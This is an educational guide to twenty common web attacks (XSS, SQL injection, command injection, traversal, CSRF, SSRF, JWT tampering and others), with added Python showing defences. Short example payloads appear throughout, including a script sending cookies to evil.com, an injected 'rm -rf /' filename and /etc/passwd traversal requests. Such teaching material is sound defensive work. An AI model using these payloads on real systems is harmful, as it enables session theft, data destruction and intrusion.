Guide: The Main Web Attacks

1. XSS (Cross-Site Scripting)

Description: XSS is a vulnerability where an attacker injects malicious JavaScript code into a web page. This code runs in the browsers of other users who visit the page.

Why and for what: Allows stealing session cookies, redirecting users to phishing sites, displaying fake login forms, or logging keystrokes.

Attack example: A site allows users to leave comments without filtering tags. The attacker posts:

<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

When other users view the comment, their browser sends session cookies to the attacker’s server.
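The comment above rendered with and without output encoding, as an added example that is not part of the original guide. The comment string is constructed; html.escape is standard-library Python and the cookie attributes are the ones a server would set on its own session cookie.

```python
import html

# Constructed comment carrying the guide's payload; not taken from a real site.
COMMENT = "<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>"

def render_comment_vulnerable(comment):
    # User text is pasted straight into the page, so the script tag is live.
    return f'<div class="comment">{comment}</div>'

def render_comment_safe(comment):
    # Body context: &, <, >, " and ' are escaped, so the browser displays the text.
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'

def render_attribute_safe(comment):
    # Attribute context: quote=True also escapes both quote characters, so the
    # value cannot close the attribute and start a new one.
    return f'<input type="text" value="{html.escape(comment, quote=True)}">'

def session_cookie(value):
    # HttpOnly keeps document.cookie from exposing the session even if some
    # script does run; Secure and SameSite limit where the cookie is sent.
    return f"session={value}; Secure; HttpOnly; SameSite=Lax"
```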


2. SQL Injection (SQLi)

Description: SQL Injection is when an attacker inserts malicious SQL commands into input fields that are directly used in database queries without proper sanitization.

Why and for what: Allows bypassing authentication, stealing, modifying, or deleting data from the database.

Attack example: Login query:

SELECT * FROM users WHERE username = '$input_username' AND password = '$input_password'

Attacker inputs:

' OR '1'='1

Resulting query:

SELECT * FROM users WHERE username = '' OR '1'='1'

The condition is always true, so the attacker logs in without knowing a password.


3. Remote Code Execution (RCE)

Description: RCE is a vulnerability that allows an attacker to execute arbitrary commands on the server.

Why and for what: Full server takeover, deleting or stealing files, installing malware.

Attack example: A site runs a command after file upload:

convert $filename output.pdf

If the attacker uploads a file named:

file.png; rm -rf /

The shell runs convert and then rm -rf /, deleting all files.
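How the upload handler above should build that command, as an added example that is not code from the guide: validate the client-supplied name against an allow-list pattern, store the file under a server-chosen name, and pass an argv list to subprocess with no shell. The upload directory and extension list are assumptions.

```python
import re
import subprocess
import uuid
from pathlib import Path

SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")   # no spaces, ';', '/', ...
ALLOWED_EXT = {".png", ".jpg", ".jpeg"}                          # assumed upload types
UPLOAD_DIR = Path("/var/uploads")                                # assumed storage path

def build_convert_command_vulnerable(filename):
    # The guide's pattern: one shell string, so metacharacters in the name
    # become extra shell commands.
    return f"convert {filename} output.pdf"

def is_safe_upload_name(filename):
    # Rejects path separators, shell metacharacters and unexpected extensions.
    return bool(SAFE_NAME.match(filename)) and Path(filename).suffix.lower() in ALLOWED_EXT

def build_convert_command(filename):
    # Returns an argv list; the stored name is chosen by the server, so the
    # command never contains client text at all.
    if not is_safe_upload_name(filename):
        raise ValueError(f"rejected upload name {filename!r}")
    stored = UPLOAD_DIR / f"{uuid.uuid4().hex}{Path(filename).suffix.lower()}"
    return ["convert", str(stored), str(UPLOAD_DIR / "output.pdf")]

def run_convert(filename):
    # shell=False passes each list element as one argument to convert itself.
    return subprocess.run(build_convert_command(filename), shell=False,
                          check=True, timeout=30)
```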


4. LFI / RFI (Local / Remote File Inclusion)

Description: The attacker tricks the server into loading local or remote files that should not be accessible.

Why and for what: To read sensitive system files or execute malicious remote code.

Attack example: URL:

https://site.com/page.php?file=../../../../etc/passwd

Returns system password file content instead of the page.


5. CSRF (Cross-Site Request Forgery)

Description: Forces a logged-in user’s browser to perform unwanted actions on a trusted site without their knowledge.

Why and for what: Unauthorized money transfers, password changes, data deletion.

Attack example: User is logged into their bank. Attacker sends an email with:

<img src="https://bank.com/transfer?to=attacker&amount=1000">

Opening the email triggers a money transfer request automatically.
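A transfer endpoint with the checks that stop the forged request above, as an added example that is not code from the guide: state changes only on POST, a per-session anti-CSRF token compared in constant time, Origin and Sec-Fetch-Site checked against the site's own origin, and SameSite on the session cookie. The site origin and the session/form dictionaries are assumptions standing in for a real framework.

```python
import hmac
import secrets

SITE_ORIGIN = "https://bank.com"   # assumed origin of the protected site

def issue_csrf_token():
    # Unpredictable per-session token; the server keeps its copy in the session.
    return secrets.token_urlsafe(32)

def csrf_request_ok(session_token, submitted_token, origin, sec_fetch_site):
    # Token must be present and equal to the session copy (constant-time compare).
    if not session_token or not submitted_token:
        return False
    if not hmac.compare_digest(session_token, submitted_token):
        return False
    # Browsers send Origin on cross-site requests: anything but our origin is refused.
    if origin is not None and origin != SITE_ORIGIN:
        return False
    # Sec-Fetch-Site, when the browser sends it, must not be cross-site.
    if sec_fetch_site not in (None, "same-origin", "none"):
        return False
    return True

def transfer_handler(method, session, form, headers):
    # State changes only via POST: the guide's <img> request is a GET and stops here.
    if method != "POST":
        return 405, "method not allowed"
    if not csrf_request_ok(session.get("csrf"), form.get("csrf"),
                           headers.get("Origin"), headers.get("Sec-Fetch-Site")):
        return 403, "CSRF check failed"
    return 200, f"transferred {form['amount']} to {form['to']}"

def session_cookie(value):
    # SameSite=Lax keeps the cookie off cross-site subresource loads such as that <img>.
    return f"session={value}; Secure; HttpOnly; SameSite=Lax"
```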


6. Broken Access Control

Description: Failure to properly check user permissions, allowing access to unauthorized data or actions.

Why and for what: Accessing other users’ accounts, admin panels, or modifying data.

Attack example: User views profile:

https://site.com/profile?id=123

Changing id to 124 shows someone else’s profile because the server never checks that the requester is allowed to view it.


7. Directory Traversal

Description: Tricks the site into reading files outside the web root directory by using path sequences such as ../ in a file parameter.

Why and for what: Steal passwords, config files, or map server file structure.

Attack example: Request:

https://site.com/view?file=../../../etc/passwd

Returns system password file content.
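A file-serving routine that defeats both the LFI request in section 4 and the traversal request in section 7, as an added example that is not code from the guide: the requested name is joined to the web root, fully resolved (symlinks and .. included), and served only if the result is still inside the root. The web root is a constructed temporary directory.

```python
import tempfile
from pathlib import Path

def resolve_under_root(web_root, requested):
    # Resolve symlinks and '..' first, then require the result to stay inside
    # web_root. A request with a leading '/' replaces the root on join and is
    # caught by the same containment check.
    root = Path(web_root).resolve()
    target = (root / requested).resolve()
    if target != root and root not in target.parents:
        raise PermissionError(f"path escapes web root: {requested!r}")
    return target

def is_contained(web_root, requested):
    try:
        resolve_under_root(web_root, requested)
        return True
    except PermissionError:
        return False

def serve_file(web_root, requested):
    target = resolve_under_root(web_root, requested)
    if not target.is_file():
        raise FileNotFoundError(requested)
    return target.read_text()

def demo():
    # Constructed web root holding one page; returns (served text, traversal blocked?).
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "about.html").write_text("<h1>About</h1>")
        served = serve_file(d, "about.html")
        blocked = not is_contained(d, "../../../../etc/passwd")
        return served, blocked
```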


8. SSRF (Server-Side Request Forgery)

Description: Forces the server to make HTTP requests to internal or external resources on behalf of the attacker.

Why and for what: Access internal services, bypass firewalls, conduct further attacks.

Attack example: Parameter:

https://site.com/fetch?url=http://localhost/admin

Server fetches internal admin page not accessible externally.
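A validator for the url parameter above, as an added example that is not code from the guide: only http/https, only hosts on an allow-list, and the resolved address must be public, so a listed name that resolves to loopback or a private range is refused too. The allow-listed host and the addresses in the test are constructed; the resolver is injectable so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"api.partner.example"}   # assumed allow-list of fetch targets

def is_public_address(ip):
    # Loopback, RFC 1918, link-local (cloud metadata lives there), multicast,
    # reserved and unspecified addresses are all off limits for a server-side fetch.
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local
                or a.is_multicast or a.is_reserved or a.is_unspecified)

def validate_fetch_url(url, resolver=socket.gethostbyname):
    # Returns (ok, detail). On success detail is the resolved IP, which the
    # caller should connect to directly so a second DNS answer cannot differ.
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname
    if host is None:
        return False, "no host"
    if host not in ALLOWED_HOSTS:
        return False, "host not on allow-list"
    try:
        ip = resolver(host)
    except OSError:
        return False, "resolution failed"
    if not is_public_address(ip):
        return False, f"resolves to non-public address {ip}"
    return True, ip
```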


9. Clickjacking

Description: Tricks a user into clicking hidden or disguised elements.

Why and for what: Make the user perform unintended actions like deleting accounts.

Attack example: A “Play” button is overlaid with a transparent frame containing a “Delete Account” button.


10. Insecure Deserialization

Description: Deserializing attacker-controlled data without validation lets a crafted object run arbitrary code when it is reconstructed.

Why and for what: Remote code execution, privilege escalation.

Attack example: Sending a crafted serialized object that executes code when deserialized.


11. Rate Limit Bypass

Description: Missing or bypassable restrictions on the number of requests a user or IP can make.

Why and for what: Brute force attacks, spam, denial of service.

Attack example: Automated scripts send thousands of login attempts per second.


12. Open Redirect

Description: Redirects users from a trusted website to a malicious one.

Why and for what: Phishing and abuse of trust.

Attack example: URL:

https://trusted.com/redirect?url=http://evil.com

User thinks they are on trusted.com but lands on a malicious site.


13. Subdomain Takeover

Description: Taking control of an unused or expired subdomain.

Why and for what: Hosting phishing or malware sites under trusted domain names.

Attack example: An expired subdomain old.example.com is registered by an attacker and used maliciously.


14. HTTP Request Smuggling

Description: Manipulating HTTP requests to confuse proxies and servers, causing one request to be interpreted as two.

Why and for what: Bypass authentication, steal data from other users.

Attack example: Sending conflicting Content-Length headers to split requests.


15. Cache Poisoning

Description: Injecting malicious content into cached responses of proxies or browsers.

Why and for what: Serve fake pages to multiple users.

Attack example: Getting a response that contains malicious JavaScript stored by a shared proxy cache, which then serves it to every later visitor.


16. Padding Oracle / Crypto Attacks

Description: Exploiting cryptographic weaknesses to decrypt or tamper with encrypted data.

Why and for what: Bypass encryption, steal data.

Attack example: Repeated queries to an oracle to decrypt ciphertext byte by byte.


17. Mass Assignment

Description: Supplying fields in an API request that the server binds to its data model without an allow-list, including fields the client should never control.

Why and for what: Escalate privileges (e.g., set isAdmin to true).

Attack example: Sending JSON payload:

{
  "username": "user",
  "isAdmin": true
}

Server accepts and grants admin rights.
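The profile update above handled with and without an allow-list, as an added example that is not code from the guide: the vulnerable binder copies every key, the safe one binds only client-settable fields, drops unknown ones with an audit entry, and rejects the whole request when it touches a server-only field. The field sets are assumptions.

```python
CLIENT_SETTABLE = {"username", "email", "display_name"}   # assumed user-editable fields
PRIVILEGED = {"isAdmin", "role", "balance"}                # assumed server-only fields

class PrivilegedFieldError(ValueError):
    pass

def bind_vulnerable(user, payload):
    # Binds every key the client sends, isAdmin included.
    user.update(payload)
    return user

def bind_safe(user, payload, audit):
    # Attempts on server-only fields fail the request outright (and are logged);
    # unknown fields are dropped; only allow-listed fields are written.
    attempted = PRIVILEGED & payload.keys()
    if attempted:
        audit.append(f"rejected update touching privileged fields {sorted(attempted)}")
        raise PrivilegedFieldError(sorted(attempted))
    for key, value in payload.items():
        if key in CLIENT_SETTABLE:
            user[key] = value
        else:
            audit.append(f"dropped unknown field {key!r}")
    return user

def apply_profile_update(user, payload, audit):
    # Returns (status, user) the way an API handler would.
    try:
        return 200, bind_safe(user, payload, audit)
    except PrivilegedFieldError:
        return 400, user

PAYLOAD = {"username": "user", "isAdmin": True}   # the guide's request body
```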


18. JWT Tampering

Description: Modifying JSON Web Tokens to gain unauthorized access.

Why and for what: Impersonate users or escalate privileges.

Attack example: Changing the user ID in the token payload; the server accepts the token without verifying its signature.
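HS256 signing and verification written out, as an added example that is not code from the guide: the verifier pins the algorithm server-side, recomputes the HMAC over header and payload, compares in constant time, and only then returns the claims. The signing key is a constructed demo value; the last function forges a token the way the section describes, solely to show the verifier rejects it.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-signing-key"   # assumed server-side HS256 key

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(payload, key=SECRET):
    # The header is fixed by the server; the signature covers header and payload.
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"

def verify_hs256(token, key=SECRET):
    # Returns the payload only after the signature checks out, otherwise None.
    # The expected algorithm is pinned here, so an 'alg' of 'none' or anything
    # else in the token header never changes which check runs.
    try:
        header, body, sig = token.split(".")
        hdr = json.loads(b64url_decode(header))
        signature = b64url_decode(sig)
    except ValueError:
        return None
    if not isinstance(hdr, dict) or hdr.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    try:
        return json.loads(b64url_decode(body))
    except ValueError:
        return None

def edit_payload_keep_signature(token, **changes):
    # Negative-test fixture for the guide's attack: edit the payload, keep the old signature.
    header, body, sig = token.split(".")
    payload = json.loads(b64url_decode(body))
    payload.update(changes)
    return f"{header}.{b64url(json.dumps(payload, separators=(',', ':')).encode())}.{sig}"
```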


19. Supply Chain Attack

Description: Injecting malicious code into third-party libraries or tools used by many projects.

Why and for what: Mass compromise, backdoors.

Attack example: A compromised npm package contains malware that infects all projects using it.


20. Public Cloud Misconfiguration

Description: Misconfigured cloud resources exposing sensitive data publicly.

Why and for what: Data leaks, compliance violations.

Attack example: An AWS S3 bucket is left public with confidential documents accessible to anyone.
